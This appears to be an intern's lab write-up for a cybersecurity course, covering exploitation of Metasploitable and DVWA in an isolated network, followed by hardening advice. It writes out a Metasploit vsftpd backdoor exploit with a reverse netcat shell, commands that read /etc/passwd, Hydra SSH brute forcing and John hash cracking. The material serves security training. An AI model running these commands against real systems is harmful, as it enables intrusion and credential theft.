Share
## https://sploitus.com/exploit?id=A41B5EAD-1A4C-56A6-97C6-1C58A1CF1E3B
# Task-4-Exploitation-System-Security
Internship: ApexPlanet โ Cybersecurity & Ethical Hacking
Intern Name: Dhonthula Sairam
Task: Task 4 โ Exploitation & System Security
Environment: Controlled lab (Kali Linux attacker โ Metasploitable/DVWA targets)
Goal: Learn responsible exploitation techniques, post-exploitation procedures, and system hardening measures. Document proof-of-concept (PoC) exploits, password cracking results, and defensive recommendations.
๐ Overview
Task 4 covers practical offensive security: controlled exploitation with Metasploit, password attacks with Hydra and John the Ripper, lightweight malware analysis methods (EICAR), and system hardening (patching, firewall, service hardening). All work was performed only on isolated lab VMs owned by me.
๐ฏ Objectives
Demonstrate safe exploitation of known vulnerabilities in lab targets.
Perform post-exploitation enumeration and evidence collection.
Demonstrate password cracking and credential risks.
Execute basic malware analysis using safe test files.
Apply system hardening steps to mitigate discovered issues.
Produce reproducible reports, screenshots, and video evidence.
โ๏ธ Lab Setup (summary)
Host: Windows / Linux with VirtualBox or VMware
Attacker: Kali Linux (latest)
Targets: Metasploitable2 / DVWA (deliberately vulnerable)
Network: Host-Only (isolated)
Tools: Metasploit, Nmap, Hydra, John the Ripper, Wireshark, tcpdump, Burp Suite, rkhunter/chkrootkit, basic ELK for logs (optional)
๐ง Tools & Purpose
Tool Purpose
Metasploit Framework Search, configure, and launch exploits; post-exploit modules
Nmap Reconnaissance: port & service discovery
Hydra Network service brute force (SSH/FTP/HTTP auth)
John the Ripper Offline hash cracking (from /etc/shadow or dumped hashes)
Wireshark / tcpdump Network traffic capture & evidence
rkhunter / chkrootkit Basic system integrity checks
Burp Suite Intercept web traffic during exploitation demos
EICAR file Safe malware test for AV/behavioral checks
๐งญ Typical Workflow & Commands
Always target only lab VMs. Copy-paste safe commands below into your README or scripts.
1. Recon (Nmap)
# SYN scan + version detection + OS fingerprint
sudo nmap -sS -sV -O -oN scan-results/target-scan.txt 192.168.56.102
2. Identify exploit (Metasploit)
msfconsole
# search by service or CVE
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.56.102
set LHOST 192.168.56.101
set LPORT 4444
set PAYLOAD cmd/unix/reverse_netcat
exploit
Capture screenshots of msfconsole session and successful whoami output.
3. Post-exploitation enumeration
# once shell obtained
uname -a
id
cat /etc/passwd
ps aux
netstat -tulnp
4. Password attacks (Hydra)
# brute-force SSH using wordlist
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.102 -t 4 -f
5. Hash cracking (John)
# extract hashes to hashes.txt (lab only), then:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt hashes.txt
john --show hashes.txt
6. Evidence capture (Wireshark / tcpdump)
# capture traffic on host-only interface
sudo tcpdump -i vboxnet0 -w screenshots/traffic.pcapng
7. Malware test (safe)
# create EICAR test file and scan (safe)
echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!' > eicar.txt
# scan with installed AV or run monitoring tools in sandbox
8. System hardening (examples)
# update the system
sudo apt update && sudo apt upgrade -y
# disable unused service (example)
sudo systemctl disable --now vsftpd
# configure simple firewall rule
sudo ufw enable
sudo ufw deny proto tcp from any to any port 21
โ
Sample Findings (example entries)
Exploit: vsftpd 2.3.4 backdoor (CVE-2011-2523) โ PoC successful, spawned root shell.
Password weakness: msfadmin:msfadmin discovered; brute-force against SSH succeeded using Hydra.
Hash cracking: Several weak hashes recovered in <5 minutes with rockyou.txt.
Network evidence: FTP credentials observed in packet captures when FTP used (unencrypted).
Each finding has: command used, timestamp, screenshot (in /screenshots/), and remediation recommendation.
๐ Mitigations & Recommendations
Short, actionable steps to secure systems:
Patch & update all services (remove vsftpd 2.3.4, update Samba/Apache/OpenSSH).
Disable legacy/unneeded services (FTP, rsh, rlogin).
Use secure protocols (SFTP/FTPS instead of FTP).
Enforce strong passwords & MFA; rotate credentials.
Harden SSH: disable root login, use key-based auth, change default port if needed.
Enable host-based logging and integrity checks (rkhunter, AIDE).
Network controls: apply firewall rules, segment networks, limit exposure of management services.
User awareness: phishing training to reduce social engineering risk.